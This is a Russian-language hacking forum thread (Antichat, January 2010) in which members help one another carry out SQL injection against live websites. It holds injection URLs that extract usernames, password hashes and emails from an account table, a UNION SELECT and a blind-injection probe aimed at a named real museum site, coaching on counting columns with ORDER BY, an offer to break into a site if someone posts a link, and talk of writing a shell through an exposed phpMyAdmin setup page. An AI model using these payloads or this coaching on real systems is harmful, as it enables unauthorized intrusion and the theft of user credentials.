07.01.2010, 00:51
|
|
Leaders of Antichat - Level 4
Регистрация: 02.06.2005
Сообщений: 1,411
С нами:
11020706
Репутация:
4693
|
|
Сообщение от KNR
Код:
localhost/index.php?modul=char&id=1062197)+and+1=(select+*+from(select+*+from(select+name_const((select+concat(username,0x3a,sha_pass_hash,0x3a,gmlevel,0x3a,email)+from+realmd.account+where+id=12),14)d)+as+t+join+(select+name_const((select+concat(username,0x3a,sha_pass_hash,0x3a,gmlevel,0x3a,email)+from+realmd.account+where+id=12),14)e)b)a)--+
Чем можно заменить name_const ?
Код:
Notice: Incorrect arguments to NAME_CONST in /var/www/web3/web/modules/char.php on line 8
пишет
__________________
Я отдал бы немало за пару крыльев,
Я отдал бы немало за третий глаз
За руку на которой четырнадцать пальцев
Мне нужен для дыхания другой газ..
Мой блог: http://qwazar.ru/.
|
|
|
07.01.2010, 02:04
|
|
Участник форума
Регистрация: 12.07.2009
Сообщений: 158
С нами:
8859263
Репутация:
334
|
|
Код:
http://www.pimaair.org/collection-detail.php?cid=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41
хз,что делать.=\ Не раскрутить. Посмотрите плз,что сделать в данной ситуации можно... |
|
|
|
07.01.2010, 02:16
|
|
Постоянный
Регистрация: 18.02.2008
Сообщений: 368
С нами:
9594385
Репутация:
386
|
|
как слепую
Код:
http://www.pimaair.org/collection-detail.php?cid=1+and+substring(version(),1,1)=4
|
|
|
|
07.01.2010, 03:35
|
|
Участник форума
Регистрация: 12.07.2009
Сообщений: 158
С нами:
8859263
Репутация:
334
|
|
ага,спс.
|
|
|
|
07.01.2010, 13:34
|
|
Познающий
Регистрация: 18.09.2006
Сообщений: 43
С нами:
10339129
Репутация:
3
|
|
есть сайт!выдает ошибку You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near.
Пробу.1+order+by+50000000000000000000/*Все что до этого числа выдается ошибкой.Unknown column '5000000000000000000' in 'order clause'Это как понять?это чё столько полей??
|
|
|
|
07.01.2010, 13:46
|
|
Участник форума
Регистрация: 18.06.2008
Сообщений: 222
С нами:
9419426
Репутация:
648
|
|
Сообщение от street16
есть сайт!выдает ошибку You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near.
Пробу.1+order+by+50000000000000000000/*Все что до этого числа выдается ошибкой.Unknown column '5000000000000000000' in 'order clause'Это как понять?это чё столько полей??
Полей меньше, подбирай число, пока ошибки нет.
|
|
|
|
07.01.2010, 13:58
|
|
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
С нами:
9410786
Репутация:
2731
|
|
Сообщение от street16
есть сайт!выдает ошибку You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near.
Пробу.1+order+by+50000000000000000000/*Все что до этого числа выдается ошибкой.Unknown column '5000000000000000000' in 'order clause'Это как понять?это чё столько полей??
Слишком уж много ты полей поставил  Ссылку кинь, раскрутим
|
|
|
|
07.01.2010, 14:27
|
|
Познающий
Регистрация: 18.09.2006
Сообщений: 43
С нами:
10339129
Репутация:
3
|
|
Сообщение от mailbrush
Слишком уж много ты полей поставил Ссылку кинь, раскрутим Просто мой первый ресурс.Хотелось бы самому!
Да все уже перепробывал все что до этого числа идет ошибка!
|
|
|
|
07.01.2010, 15:56
|
|
Постоянный
Регистрация: 15.03.2008
Сообщений: 441
С нами:
9555536
Репутация:
95
|
|
что можно поиметь с этого: _http://vulns.ru/myadmin/scripts/setup.php
реально ли добавить новую БД или попасть в текущую?
|
|
|
|
07.01.2010, 16:03
|
|
Участник форума
Регистрация: 18.06.2008
Сообщений: 222
С нами:
9419426
Репутация:
648
|
|
Сообщение от jecka3000
что можно поиметь с этого: _http://vulns.ru/myadmin/scripts/setup.php
реально ли добавить новую БД или попасть в текущую?
Там нет директории конфига, поэтому перезаписать конфиг шеллом не получится.
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид
